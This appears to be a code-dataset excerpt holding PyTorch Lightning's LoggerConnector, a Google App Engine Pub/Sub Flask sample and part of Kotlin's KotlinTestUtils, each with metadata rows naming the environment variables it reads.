# limitations under the License.
import os
from copy import deepcopy
from pprint import pprint
from typing import Dict, Iterable, List, Optional, Union
import torch
from pytorch_lightning.core import memory
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.loggers import LoggerCollection, TensorBoardLogger
from pytorch_lightning.trainer.connectors.logger_connector.callback_hook_validator import CallbackHookNameValidator
from pytorch_lightning.trainer.connectors.logger_connector.epoch_result_store import EpochResultStore
from pytorch_lightning.trainer.connectors.logger_connector.metrics_holder import MetricsHolder
from pytorch_lightning.trainer.states import RunningStage, TrainerState
from pytorch_lightning.utilities import DeviceType
from pytorch_lightning.utilities.metrics import metrics_to_scalars
class LoggerConnector:
def __init__(self, trainer, log_gpu_memory: Optional[str] = None):
self.trainer = trainer
self.log_gpu_memory = log_gpu_memory
self._callback_metrics = MetricsHolder()
self._evaluation_callback_metrics = MetricsHolder(to_float=True)
self._logged_metrics = MetricsHolder()
self._progress_bar_metrics = MetricsHolder(to_float=True)
self.eval_loop_results = []
self._cached_results = {stage: EpochResultStore(trainer) for stage in RunningStage}
self._cached_results[None] = EpochResultStore(trainer)
self._callback_hook_validator = CallbackHookNameValidator()
@property
def callback_metrics(self) -> Dict:
return self.get_metrics("callback_metrics")
@callback_metrics.setter
def callback_metrics(self, callback_metrics: Dict) -> None:
self.set_metrics("callback_metrics", callback_metrics)
@property
def evaluation_callback_metrics(self) -> Dict:
return self.get_metrics("evaluation_callback_metrics")
@evaluation_callback_metrics.setter
def evaluation_callback_metrics(self, evaluation_callback_metrics: Dict) -> None:
self.set_metrics("evaluation_callback_metrics", evaluation_callback_metrics)
@property
def logged_metrics(self) -> Dict:
return self.get_metrics("logged_metrics")
@logged_metrics.setter
def logged_metrics(self, logged_metrics: Dict) -> None:
self.set_metrics("logged_metrics", logged_metrics)
@property
def progress_bar_metrics(self) -> Dict:
return self.get_metrics("progress_bar_metrics")
@progress_bar_metrics.setter
def progress_bar_metrics(self, progress_bar_metrics: Dict) -> None:
self.set_metrics("progress_bar_metrics", progress_bar_metrics)
@property
def cached_results(self) -> Union[EpochResultStore, None]:
return self._cached_results.get(self.trainer._running_stage)
def get_metrics(self, key: str) -> Dict:
metrics_holder: MetricsHolder = getattr(self, f"_{key}")
model = self.trainer.lightning_module
metrics_holder.convert(model.device if model is not None else None)
return metrics_holder.metrics
def set_metrics(self, key: str, val: Dict) -> None:
metrics_holder: MetricsHolder = getattr(self, f"_{key}")
metrics_holder.reset(val)
def reset(self) -> None:
self.cached_results.reset()
def check_logging_in_callbacks(self, hook_fx_name, on_step: bool = None, on_epoch: bool = None) -> None:
self._callback_hook_validator.check_logging_in_callbacks(
current_hook_fx_name=hook_fx_name, on_step=on_step, on_epoch=on_epoch
)
def on_evaluation_batch_start(self, batch, dataloader_idx, num_dataloaders):
model = self.trainer.lightning_module
# set dataloader_idx only if there are multiple dataloaders
model._current_dataloader_idx = dataloader_idx if num_dataloaders > 1 else None
# track batch_size
self.cached_results._batch_size = Result.extract_batch_size(batch)
def on_train_split_start(self, split_idx: int, opt_idx: int, split_batch) -> None:
self.cached_results._split_idx = split_idx
self.cached_results._opt_idx = opt_idx
self.cached_results._batch_size = Result.extract_batch_size(split_batch)
def on_train_batch_end(self) -> None:
self.cached_results._split_idx = None
self.cached_results._opt_idx = None
self.cached_results._batch_size = None
def cache_logged_metrics(self):
self._cached_results[self.trainer._running_stage].cache_result()
def on_trainer_init(self, logger, flush_logs_every_n_steps: int, log_every_n_steps: int, move_metrics_to_cpu: bool):
# logging
self.configure_logger(logger)
self.trainer.flush_logs_every_n_steps = flush_logs_every_n_steps
self.trainer.log_every_n_steps = log_every_n_steps
self.trainer.move_metrics_to_cpu = move_metrics_to_cpu
self.trainer.split_idx = None
@property
def should_flush_logs(self):
should_flush = (self.trainer.global_step + 1) % self.trainer.flush_logs_every_n_steps == 0
return should_flush or self.trainer.should_stop
@property
def should_update_logs(self):
should_log_every_n_steps = (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0
return should_log_every_n_steps or self.trainer.should_stop
def configure_logger(self, logger):
if logger is True:
version = os.environ.get('PL_EXP_VERSION', self.trainer.slurm_job_id)
# default logger
self.trainer.logger = TensorBoardLogger(
save_dir=self.trainer.default_root_dir, version=version, name='lightning_logs'
)
elif logger is False:
self.trainer.logger = None
else:
if isinstance(logger, Iterable):
self.trainer.logger = LoggerCollection(logger)
else:
self.trainer.logger = logger
def cache_training_step_metrics(self, opt_closure_result):
"""
Update the logger_connector's internal metrics holders for the deprecated logging path.
"""
using_results_obj = isinstance(opt_closure_result.training_step_output, Result)
# temporary dict to collect metrics
logged_metrics_tmp = {}
pbar_metrics_tmp = {}
callback_metrics_tmp = {}
if using_results_obj:
batch_log_metrics = opt_closure_result.training_step_output.get_batch_log_metrics(
include_forked_originals=False
)
logged_metrics_tmp.update(batch_log_metrics)
batch_pbar_metrics = opt_closure_result.training_step_output.get_batch_pbar_metrics(
include_forked_originals=False
)
pbar_metrics_tmp.update(batch_pbar_metrics)
forked_metrics = opt_closure_result.training_step_output.get_forked_metrics()
callback_metrics_tmp.update(forked_metrics)
callback_metrics_tmp.update(logged_metrics_tmp)
else:
batch_log_metrics = opt_closure_result.training_step_output.log_metrics
logged_metrics_tmp.update(batch_log_metrics)
batch_pbar_metrics = opt_closure_result.training_step_output.pbar_on_batch_end
pbar_metrics_tmp.update(batch_pbar_metrics)
# track progress bar metrics
if len(pbar_metrics_tmp) > 0:
self.add_progress_bar_metrics(pbar_metrics_tmp)
self._callback_metrics.update(callback_metrics_tmp)
self._logged_metrics.update(logged_metrics_tmp)
def log_metrics(self, metrics, grad_norm_dic, step=None):
"""Logs the metric dict passed in.
If the `step` parameter is None and a `step` key is present in metrics,
uses metrics["step"] as a step
Args:
metrics (dict): Metric values
grad_norm_dic (dict): Gradient norms
step (int): Step for which metrics should be logged. Default value corresponds to `self.global_step`
"""
# add gpu memory
if self.trainer._device_type == DeviceType.GPU and self.log_gpu_memory:
mem_map = memory.get_memory_profile(self.log_gpu_memory)
metrics.update(mem_map)
# add norms
metrics.update(grad_norm_dic)
# turn all tensors to scalars
scalar_metrics = metrics_to_scalars(metrics)
if "step" in scalar_metrics and step is None:
step = scalar_metrics.pop("step")
elif step is None:
# metrics added by Lightning for convenience
scalar_metrics['epoch'] = self.trainer.current_epoch
step = self.trainer.global_step
# log actual metrics
if self.trainer.logger is not None:
if self.trainer.is_global_zero:
self.trainer.logger.agg_and_log_metrics(scalar_metrics, step=step)
self.trainer.logger.save()
# track the logged metrics
self.logged_metrics.update(scalar_metrics)
self.trainer.dev_debugger.track_logged_metrics_history(scalar_metrics)
def add_progress_bar_metrics(self, metrics):
for k, v in metrics.items():
if isinstance(v, torch.Tensor):
v = v.item()
self._progress_bar_metrics.metrics[k] = v
self.trainer.dev_debugger.track_pbar_metrics_history(metrics)
def evaluation_epoch_end(self):
# reset dataloader idx
model_ref = self.trainer.lightning_module
model_ref._current_dataloader_idx = None
# setting `has_batch_loop_finished` to True
# will perform Results reduction across the entire epoch.
self.cached_results.has_batch_loop_finished = True
def add_to_eval_loop_results(self, dl_idx, has_been_initialized):
callback_metrics = deepcopy(self.evaluation_callback_metrics)
for key in list(callback_metrics.keys()):
if "dataloader_idx" in key:
if f"dataloader_idx_{dl_idx}" not in key:
# remove dl_idx from self.callback_metrics not belonging to this dataset.
del callback_metrics[key]
if has_been_initialized:
self.eval_loop_results[dl_idx].update(callback_metrics)
else:
self.eval_loop_results.append(callback_metrics)
def prepare_eval_loop_results(self):
num_dataloaders = self.trainer.evaluation_loop.num_dataloaders
has_been_initialized = len(self.eval_loop_results) == num_dataloaders
for dl_idx in range(self.trainer.evaluation_loop.num_dataloaders):
self.add_to_eval_loop_results(dl_idx, has_been_initialized)
def get_evaluate_epoch_results(self):
if not self.trainer.sanity_checking:
# log all the metrics as a single dict
metrics_to_log = self.cached_results.get_epoch_log_metrics()
if len(metrics_to_log) > 0:
self.log_metrics(metrics_to_log, {})
self.prepare_eval_loop_results()
# log results of evaluation
if (
self.trainer.state != TrainerState.FITTING and self.trainer.evaluating and self.trainer.is_global_zero
and self.trainer.verbose_evaluate
):
print('-' * 80)
for result_idx, results in enumerate(self.eval_loop_results):
print(f'DATALOADER:{result_idx} {self.trainer._running_stage.upper()} RESULTS')
pprint({
k: (v.item() if v.numel() == 1 else v.tolist()) if isinstance(v, torch.Tensor) else v
for k, v in results.items()
})
print('-' * 80)
results = self.eval_loop_results
# clear mem
self.eval_loop_results = []
return results
def on_train_epoch_end(self):
# inform cached logger connector epoch finished
self.cached_results.has_batch_loop_finished = True
def log_train_epoch_end_metrics(self, epoch_output: List[List[List[Result]]]) -> None:
# epoch output is a list. Each item in that list has all the outputs per optimizer
# epoch_output[optimizer_idx][training_step_idx][tbptt_index]
# remember that not using truncated backprop is equivalent to truncated backprop of length 1
# log/aggregate metrics automatically
epoch_log_metrics, epoch_progress_bar_metrics = self.__auto_reduce_results_on_epoch_end(epoch_output)
# it will perform reduction over epoch and return log metrics
cached_epoch_log_metrics = self.cached_results.get_epoch_log_metrics()
cached_epoch_pbar_metrics = self.cached_results.get_epoch_pbar_metrics()
# update
epoch_log_metrics.update(cached_epoch_log_metrics)
epoch_progress_bar_metrics.update(cached_epoch_pbar_metrics)
# --------------------------
# track results
# --------------------------
# add the metrics to the loggers and callbacks
if epoch_log_metrics and len(epoch_log_metrics) > 0:
self.log_metrics(epoch_log_metrics, {})
self._callback_metrics.update(epoch_log_metrics)
# add metrics to progress_bar and callbacks
if len(epoch_progress_bar_metrics) > 0:
self.add_progress_bar_metrics(epoch_progress_bar_metrics)
self._callback_metrics.update(epoch_progress_bar_metrics)
# reset epoch loop result for next epoch
self.cached_results.reset()
def __auto_reduce_results_on_epoch_end(self, epoch_output):
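# Reduce each optimizer's outputs across truncated-BPTT splits and training steps, then collect epoch-level log and progress-bar metrics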
epoch_log_metrics = {}
epoch_progress_bar_metrics = {}
for opt_outputs in epoch_output:
# reduce across time first
time_reduced_outputs = []
for tbptt_outs in opt_outputs:
tbptt_outs = tbptt_outs[0].__class__.reduce_across_time(tbptt_outs)
if len(tbptt_outs) > 1:
time_reduced_outputs.append(tbptt_outs)
if len(time_reduced_outputs) == 0:
continue
# reduce across training steps
opt_outputs = time_reduced_outputs[0].__class__.reduce_on_epoch_end(time_reduced_outputs)
# with manual optimization we need 1 + metrics because meta is always there
if opt_outputs.minimize is not None:
opt_outputs.minimize = opt_outputs.minimize.mean()
epoch_log_metrics.update(opt_outputs.epoch_log_metrics)
epoch_progress_bar_metrics.update(opt_outputs.epoch_pbar_metrics)
return epoch_log_metrics, epoch_progress_bar_metrics
def log_train_step_metrics(self, batch_output):
if self.trainer.train_loop.should_accumulate() and self.trainer.lightning_module.automatic_optimization:
return
_, batch_log_metrics = self.cached_results.update_logger_connector()
# when metrics should be logged
if self.should_update_logs or self.trainer.fast_dev_run is True:
# logs user requested information to logger
grad_norm_dic = batch_output.grad_norm_dic
if grad_norm_dic is None:
grad_norm_dic = {}
if len(batch_log_metrics) > 0 or len(grad_norm_dic) > 0:
self.log_metrics(batch_log_metrics, grad_norm_dic)
self._callback_metrics.update(batch_log_metrics)
|
[] |
[] |
[
"PL_EXP_VERSION"
] |
[]
|
["PL_EXP_VERSION"]
|
python
| 1 | 0 | |
appengine/flexible/pubsub/main.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START app]
import base64
import json
import logging
import os
from flask import current_app, Flask, render_template, request
from gcloud import pubsub
app = Flask(__name__)
# Configure the following environment variables via app.yaml
# This is used in the push request handler to verify that the request came from
# pubsub and originated from a trusted source.
app.config['PUBSUB_VERIFICATION_TOKEN'] = \
os.environ['PUBSUB_VERIFICATION_TOKEN']
app.config['PUBSUB_TOPIC'] = os.environ['PUBSUB_TOPIC']
# Global list to store messages received by this instance.
MESSAGES = []
# [START index]
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
return render_template('index.html', messages=MESSAGES)
ps = pubsub.Client()
topic = ps.topic(current_app.config['PUBSUB_TOPIC'])
topic.publish(
request.form.get('payload', 'Example payload').encode('utf-8'))
return 'OK', 200
# [END index]
# [START push]
@app.route('/pubsub/push', methods=['POST'])
def pubsub_push():
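# Reject pushes that do not carry the verification token configured for this app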
if (request.args.get('token', '') !=
current_app.config['PUBSUB_VERIFICATION_TOKEN']):
return 'Invalid request', 400
envelope = json.loads(request.data.decode('utf-8'))
payload = base64.b64decode(envelope['message']['data'])
MESSAGES.append(payload)
# Returning any 2xx status indicates successful receipt of the message.
return 'OK', 200
# [END push]
@app.errorhandler(500)
def server_error(e):
logging.exception('An error occurred during a request.')
return """
An internal error occurred: <pre>{}</pre>
See logs for full stacktrace.
""".format(e), 500
if __name__ == '__main__':
# This is used when running locally. Gunicorn is used to run the
# application on Google App Engine. See entrypoint in app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
# [END app]
|
[] |
[] |
[
"PUBSUB_VERIFICATION_TOKEN",
"PUBSUB_TOPIC"
] |
[]
|
["PUBSUB_VERIFICATION_TOKEN", "PUBSUB_TOPIC"]
|
python
| 2 | 0 | |
compiler/tests-common/tests/org/jetbrains/kotlin/test/KotlinTestUtils.java
|
/*
* Copyright 2010-2019 JetBrains s.r.o. and Kotlin Programming Language contributors.
* Use of this source code is governed by the Apache 2.0 license that can be found in the license/LICENSE.txt file.
*/
package org.jetbrains.kotlin.test;
import com.google.common.collect.Lists;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.util.SystemInfo;
import com.intellij.openapi.util.io.FileUtil;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.openapi.vfs.CharsetToolkit;
import com.intellij.psi.PsiElement;
import com.intellij.rt.execution.junit.FileComparisonFailure;
import com.intellij.testFramework.TestDataFile;
import junit.framework.TestCase;
import kotlin.Unit;
import kotlin.collections.CollectionsKt;
import kotlin.jvm.functions.Function0;
import kotlin.jvm.functions.Function1;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import org.jetbrains.kotlin.analyzer.AnalysisResult;
import org.jetbrains.kotlin.builtins.DefaultBuiltIns;
import org.jetbrains.kotlin.builtins.KotlinBuiltIns;
import org.jetbrains.kotlin.checkers.CompilerTestLanguageVersionSettingsKt;
import org.jetbrains.kotlin.cli.common.CLIConfigurationKeys;
import org.jetbrains.kotlin.cli.common.config.ContentRootsKt;
import org.jetbrains.kotlin.cli.common.config.KotlinSourceRoot;
import org.jetbrains.kotlin.cli.common.messages.CompilerMessageSeverity;
import org.jetbrains.kotlin.cli.common.messages.CompilerMessageSourceLocation;
import org.jetbrains.kotlin.cli.common.messages.MessageCollector;
import org.jetbrains.kotlin.cli.jvm.compiler.EnvironmentConfigFiles;
import org.jetbrains.kotlin.cli.jvm.compiler.KotlinCoreEnvironment;
import org.jetbrains.kotlin.cli.jvm.config.JvmContentRootsKt;
import org.jetbrains.kotlin.codegen.forTestCompile.ForTestCompileRuntime;
import org.jetbrains.kotlin.config.CommonConfigurationKeys;
import org.jetbrains.kotlin.config.CompilerConfiguration;
import org.jetbrains.kotlin.config.JVMConfigurationKeys;
import org.jetbrains.kotlin.descriptors.impl.ModuleDescriptorImpl;
import org.jetbrains.kotlin.jvm.compiler.LoadDescriptorUtil;
import org.jetbrains.kotlin.lexer.KtTokens;
import org.jetbrains.kotlin.name.Name;
import org.jetbrains.kotlin.psi.KtFile;
import org.jetbrains.kotlin.psi.KtPsiFactoryKt;
import org.jetbrains.kotlin.resolve.lazy.JvmResolveUtil;
import org.jetbrains.kotlin.storage.LockBasedStorageManager;
import org.jetbrains.kotlin.test.testFramework.KtUsefulTestCase;
import org.jetbrains.kotlin.test.util.JUnit4Assertions;
import org.jetbrains.kotlin.test.util.KtTestUtil;
import org.jetbrains.kotlin.test.util.StringUtilsKt;
import org.jetbrains.kotlin.utils.ExceptionUtilsKt;
import org.junit.Assert;
import java.io.File;
import java.io.IOException;
import java.lang.annotation.Annotation;
import java.lang.reflect.Method;
import java.nio.file.Path;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import static org.jetbrains.kotlin.test.InTextDirectivesUtils.IGNORE_BACKEND_DIRECTIVE_PREFIX;
import static org.jetbrains.kotlin.test.InTextDirectivesUtils.isIgnoredTarget;
public class KotlinTestUtils {
public static String TEST_MODULE_NAME = "test-module";
public static final String TEST_GENERATOR_NAME = "org.jetbrains.kotlin.generators.tests.TestsPackage";
private static final boolean RUN_IGNORED_TESTS_AS_REGULAR =
Boolean.getBoolean("org.jetbrains.kotlin.run.ignored.tests.as.regular");
private static final boolean PRINT_STACKTRACE_FOR_IGNORED_TESTS =
Boolean.getBoolean("org.jetbrains.kotlin.print.stacktrace.for.ignored.tests");
private static final boolean DONT_IGNORE_TESTS_WORKING_ON_COMPATIBLE_BACKEND =
Boolean.getBoolean("org.jetbrains.kotlin.dont.ignore.tests.working.on.compatible.backend");
private static final boolean AUTOMATICALLY_UNMUTE_PASSED_TESTS = false;
private static final boolean AUTOMATICALLY_MUTE_FAILED_TESTS = false;
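// Matches test directives of the form "// NAME: value" (optionally prefixed with '!') at the start of a line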
private static final Pattern DIRECTIVE_PATTERN = Pattern.compile("^//\\s*[!]?([A-Z_]+)(:[ \\t]*(.*))?$", Pattern.MULTILINE);
private KotlinTestUtils() {
}
@NotNull
public static AnalysisResult analyzeFile(@NotNull KtFile file, @NotNull KotlinCoreEnvironment environment) {
return JvmResolveUtil.analyze(file, environment);
}
@NotNull
public static KotlinCoreEnvironment createEnvironmentWithMockJdkAndIdeaAnnotations(Disposable disposable) {
return createEnvironmentWithMockJdkAndIdeaAnnotations(disposable, ConfigurationKind.ALL);
}
@NotNull
public static KotlinCoreEnvironment createEnvironmentWithMockJdkAndIdeaAnnotations(Disposable disposable, @NotNull ConfigurationKind configurationKind) {
return createEnvironmentWithJdkAndNullabilityAnnotationsFromIdea(disposable, configurationKind, TestJdkKind.MOCK_JDK);
}
@NotNull
public static KotlinCoreEnvironment createEnvironmentWithJdkAndNullabilityAnnotationsFromIdea(
@NotNull Disposable disposable,
@NotNull ConfigurationKind configurationKind,
@NotNull TestJdkKind jdkKind
) {
return KotlinCoreEnvironment.createForTests(
disposable, newConfiguration(configurationKind, jdkKind, KtTestUtil.getAnnotationsJar()), EnvironmentConfigFiles.JVM_CONFIG_FILES
);
}
@NotNull
public static KotlinCoreEnvironment createEnvironmentWithFullJdkAndIdeaAnnotations(Disposable disposable) {
return createEnvironmentWithJdkAndNullabilityAnnotationsFromIdea(disposable, ConfigurationKind.ALL, TestJdkKind.FULL_JDK);
}
@NotNull
public static File tmpDirForTest(TestCase test) throws IOException {
return KtTestUtil.tmpDirForTest(test.getClass().getSimpleName(), test.getName());
}
@NotNull
public static CompilerConfiguration newConfiguration() {
CompilerConfiguration configuration = new CompilerConfiguration();
configuration.put(CommonConfigurationKeys.MODULE_NAME, TEST_MODULE_NAME);
configuration.put(CLIConfigurationKeys.MESSAGE_COLLECTOR_KEY, new MessageCollector() {
@Override
public void clear() {
}
@Override
public void report(
@NotNull CompilerMessageSeverity severity, @NotNull String message, @Nullable CompilerMessageSourceLocation location
) {
if (severity == CompilerMessageSeverity.ERROR) {
String prefix = location == null
? ""
: "(" + location.getPath() + ":" + location.getLine() + ":" + location.getColumn() + ") ";
throw new AssertionError(prefix + message);
}
}
@Override
public boolean hasErrors() {
return false;
}
});
return configuration;
}
@NotNull
public static CompilerConfiguration newConfiguration(
@NotNull ConfigurationKind configurationKind,
@NotNull TestJdkKind jdkKind,
@NotNull File... extraClasspath
) {
return newConfiguration(configurationKind, jdkKind, Arrays.asList(extraClasspath), Collections.emptyList());
}
@NotNull
public static CompilerConfiguration newConfiguration(
@NotNull ConfigurationKind configurationKind,
@NotNull TestJdkKind jdkKind,
@NotNull List<File> classpath,
@NotNull List<File> javaSource
) {
CompilerConfiguration configuration = newConfiguration();
JvmContentRootsKt.addJavaSourceRoots(configuration, javaSource);
if (jdkKind == TestJdkKind.MOCK_JDK) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, KtTestUtil.findMockJdkRtJar());
configuration.put(JVMConfigurationKeys.NO_JDK, true);
}
else if (jdkKind == TestJdkKind.MODIFIED_MOCK_JDK) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, KtTestUtil.findMockJdkRtModified());
configuration.put(JVMConfigurationKeys.NO_JDK, true);
}
else if (jdkKind == TestJdkKind.ANDROID_API) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, KtTestUtil.findAndroidApiJar());
configuration.put(JVMConfigurationKeys.NO_JDK, true);
}
else if (jdkKind == TestJdkKind.FULL_JDK_6) {
String jdk6 = System.getenv("JDK_16");
assert jdk6 != null : "Environment variable JDK_16 is not set";
configuration.put(JVMConfigurationKeys.JDK_HOME, new File(jdk6));
}
else if (jdkKind == TestJdkKind.FULL_JDK_9) {
configuration.put(JVMConfigurationKeys.JDK_HOME, KtTestUtil.getJdk9Home());
}
else if (jdkKind == TestJdkKind.FULL_JDK_15) {
configuration.put(JVMConfigurationKeys.JDK_HOME, KtTestUtil.getJdk15Home());
}
else if (SystemInfo.IS_AT_LEAST_JAVA9) {
configuration.put(JVMConfigurationKeys.JDK_HOME, new File(System.getProperty("java.home")));
}
if (configurationKind.getWithRuntime()) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.runtimeJarForTests());
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.scriptRuntimeJarForTests());
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.kotlinTestJarForTests());
}
else if (configurationKind.getWithMockRuntime()) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.minimalRuntimeJarForTests());
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.scriptRuntimeJarForTests());
}
if (configurationKind.getWithReflection()) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.reflectJarForTests());
}
JvmContentRootsKt.addJvmClasspathRoots(configuration, classpath);
return configuration;
}
public static void resolveAllKotlinFiles(KotlinCoreEnvironment environment) throws IOException {
List<KotlinSourceRoot> roots = ContentRootsKt.getKotlinSourceRoots(environment.getConfiguration());
if (roots.isEmpty()) return;
List<KtFile> ktFiles = new ArrayList<>();
for (KotlinSourceRoot root : roots) {
File file = new File(root.getPath());
if (file.isFile()) {
ktFiles.add(loadJetFile(environment.getProject(), file));
}
else {
//noinspection ConstantConditions
for (File childFile : file.listFiles()) {
if (childFile.getName().endsWith(".kt") || childFile.getName().endsWith(".kts")) {
ktFiles.add(loadJetFile(environment.getProject(), childFile));
}
}
}
}
JvmResolveUtil.analyze(ktFiles, environment);
}
public static void assertEqualsToFile(@NotNull Path expectedFile, @NotNull String actual) {
assertEqualsToFile(expectedFile.toFile(), actual);
}
public static void assertEqualsToFile(@NotNull File expectedFile, @NotNull String actual) {
assertEqualsToFile(expectedFile, actual, s -> s);
}
public static void assertEqualsToFile(@NotNull String message, @NotNull File expectedFile, @NotNull String actual) {
assertEqualsToFile(message, expectedFile, actual, s -> s);
}
public static void assertEqualsToFile(@NotNull File expectedFile, @NotNull String actual, @NotNull Function1<String, String> sanitizer) {
assertEqualsToFile("Actual data differs from file content", expectedFile, actual, sanitizer);
}
public static void assertEqualsToFile(@NotNull String message, @NotNull File expectedFile, @NotNull String actual, @NotNull Function1<String, String> sanitizer) {
try {
String actualText = StringUtilsKt.trimTrailingWhitespacesAndAddNewlineAtEOF(StringUtil.convertLineSeparators(actual.trim()));
if (!expectedFile.exists()) {
if (KtUsefulTestCase.IS_UNDER_TEAMCITY) {
Assert.fail("Expected data file " + expectedFile + " did not exist");
} else {
FileUtil.writeToFile(expectedFile, actualText);
Assert.fail("Expected data file did not exist. Generating: " + expectedFile);
}
}
String expected = FileUtil.loadFile(expectedFile, CharsetToolkit.UTF8, true);
String expectedText = StringUtilsKt.trimTrailingWhitespacesAndAddNewlineAtEOF(StringUtil.convertLineSeparators(expected.trim()));
if (!Objects.equals(sanitizer.invoke(expectedText), sanitizer.invoke(actualText))) {
throw new FileComparisonFailure(message + ": " + expectedFile.getName(),
expected, actual, expectedFile.getAbsolutePath());
}
}
catch (IOException e) {
throw ExceptionUtilsKt.rethrow(e);
}
}
public static boolean compileKotlinWithJava(
@NotNull List<File> javaFiles,
@NotNull List<File> ktFiles,
@NotNull File outDir,
@NotNull Disposable disposable,
@Nullable File javaErrorFile
) throws IOException {
return compileKotlinWithJava(javaFiles, ktFiles, outDir, disposable, javaErrorFile, null);
}
public static boolean compileKotlinWithJava(
@NotNull List<File> javaFiles,
@NotNull List<File> ktFiles,
@NotNull File outDir,
@NotNull Disposable disposable,
@Nullable File javaErrorFile,
@Nullable Function1<CompilerConfiguration, Unit> updateConfiguration
) throws IOException {
if (!ktFiles.isEmpty()) {
KotlinCoreEnvironment environment = createEnvironmentWithFullJdkAndIdeaAnnotations(disposable);
CompilerTestLanguageVersionSettingsKt.setupLanguageVersionSettingsForMultifileCompilerTests(ktFiles, environment);
if (updateConfiguration != null) {
updateConfiguration.invoke(environment.getConfiguration());
}
LoadDescriptorUtil.compileKotlinToDirAndGetModule(ktFiles, outDir, environment);
}
else {
boolean mkdirs = outDir.mkdirs();
assert mkdirs : "Not created: " + outDir;
}
if (javaFiles.isEmpty()) return true;
return compileJavaFiles(javaFiles, Arrays.asList(
"-classpath", outDir.getPath() + File.pathSeparator + ForTestCompileRuntime.runtimeJarForTests(),
"-d", outDir.getPath()
), javaErrorFile);
}
@NotNull
public static Directives parseDirectives(String expectedText) {
return parseDirectives(expectedText, new Directives());
}
@NotNull
public static Directives parseDirectives(String expectedText, @NotNull Directives directives) {
Matcher directiveMatcher = DIRECTIVE_PATTERN.matcher(expectedText);
while (directiveMatcher.find()) {
String name = directiveMatcher.group(1);
String value = directiveMatcher.group(3);
directives.put(name, value);
}
return directives;
}
public static List<String> loadBeforeAfterText(String filePath) {
String content;
try {
content = FileUtil.loadFile(new File(filePath), true);
}
catch (IOException e) {
throw new RuntimeException(e);
}
List<String> files = TestFiles.createTestFiles("", content, new TestFiles.TestFileFactoryNoModules<String>() {
@NotNull
@Override
public String create(@NotNull String fileName, @NotNull String text, @NotNull Directives directives) {
int firstLineEnd = text.indexOf('\n');
return StringUtil.trimTrailing(text.substring(firstLineEnd + 1));
}
});
Assert.assertTrue("Exactly two files expected: ", files.size() == 2);
return files;
}
public enum CommentType {
ALL,
LINE_COMMENT,
BLOCK_COMMENT
}
@NotNull
public static String getLastCommentInFile(@NotNull KtFile file) {
return CollectionsKt.first(getLastCommentsInFile(file, CommentType.ALL, true));
}
@NotNull
public static List<String> getLastCommentsInFile(@NotNull KtFile file, CommentType commentType, boolean assertMustExist) {
PsiElement lastChild = file.getLastChild();
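        // Skip a trailing whitespace node so the scan starts at the last meaningful PSI element.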
if (lastChild != null && lastChild.getNode().getElementType().equals(KtTokens.WHITE_SPACE)) {
lastChild = lastChild.getPrevSibling();
}
assert lastChild != null;
List<String> comments = new ArrayList<>();
while (true) {
if (lastChild.getNode().getElementType().equals(KtTokens.BLOCK_COMMENT)) {
if (commentType == CommentType.ALL || commentType == CommentType.BLOCK_COMMENT) {
String lastChildText = lastChild.getText();
comments.add(lastChildText.substring(2, lastChildText.length() - 2).trim());
}
}
else if (lastChild.getNode().getElementType().equals(KtTokens.EOL_COMMENT)) {
if (commentType == CommentType.ALL || commentType == CommentType.LINE_COMMENT) {
comments.add(lastChild.getText().substring(2).trim());
}
}
else {
break;
}
lastChild = lastChild.getPrevSibling();
}
if (comments.isEmpty() && assertMustExist) {
throw new AssertionError(String.format(
"Test file '%s' should end in a comment of type %s; last node was: %s", file.getName(), commentType, lastChild));
}
return comments;
}
public static boolean compileJavaFiles(@NotNull Collection<File> files, List<String> options) throws IOException {
return compileJavaFiles(files, options, null);
}
private static boolean compileJavaFiles(@NotNull Collection<File> files, List<String> options, @Nullable File javaErrorFile) throws IOException {
return JvmCompilationUtils.compileJavaFiles(files, options, javaErrorFile, JUnit4Assertions.INSTANCE);
}
public static boolean compileJavaFilesExternallyWithJava9(@NotNull Collection<File> files, @NotNull List<String> options) {
return JvmCompilationUtils.compileJavaFilesExternally(files, options, KtTestUtil.getJdk9Home());
}
public static boolean compileJavaFilesExternally(@NotNull Collection<File> files, @NotNull List<String> options, @NotNull File jdkHome) {
return JvmCompilationUtils.compileJavaFilesExternally(files, options, jdkHome);
}
public static String navigationMetadata(@TestDataFile String testFile) {
return testFile;
}
public interface DoTest {
void invoke(@NotNull String filePath) throws Exception;
}
public static void runTest(@NotNull DoTest test, @NotNull TestCase testCase, @TestDataFile String testDataFile) throws Exception {
runTestImpl(testWithCustomIgnoreDirective(test, TargetBackend.ANY, IGNORE_BACKEND_DIRECTIVE_PREFIX), testCase, testDataFile);
}
public static void runTest(@NotNull TestCase testCase, @NotNull Function0<Unit> test) {
MuteWithDatabaseKt.runTest(testCase, test);
}
public static void runTestWithThrowable(@NotNull TestCase testCase, @NotNull RunnableWithThrowable test) {
MuteWithDatabaseKt.runTest(testCase, () -> {
try {
test.run();
}
catch (Throwable throwable) {
throw new IllegalStateException(throwable);
}
return null;
});
}
// In this test runner version the `testDataFile` parameter is annotated by `TestDataFile`.
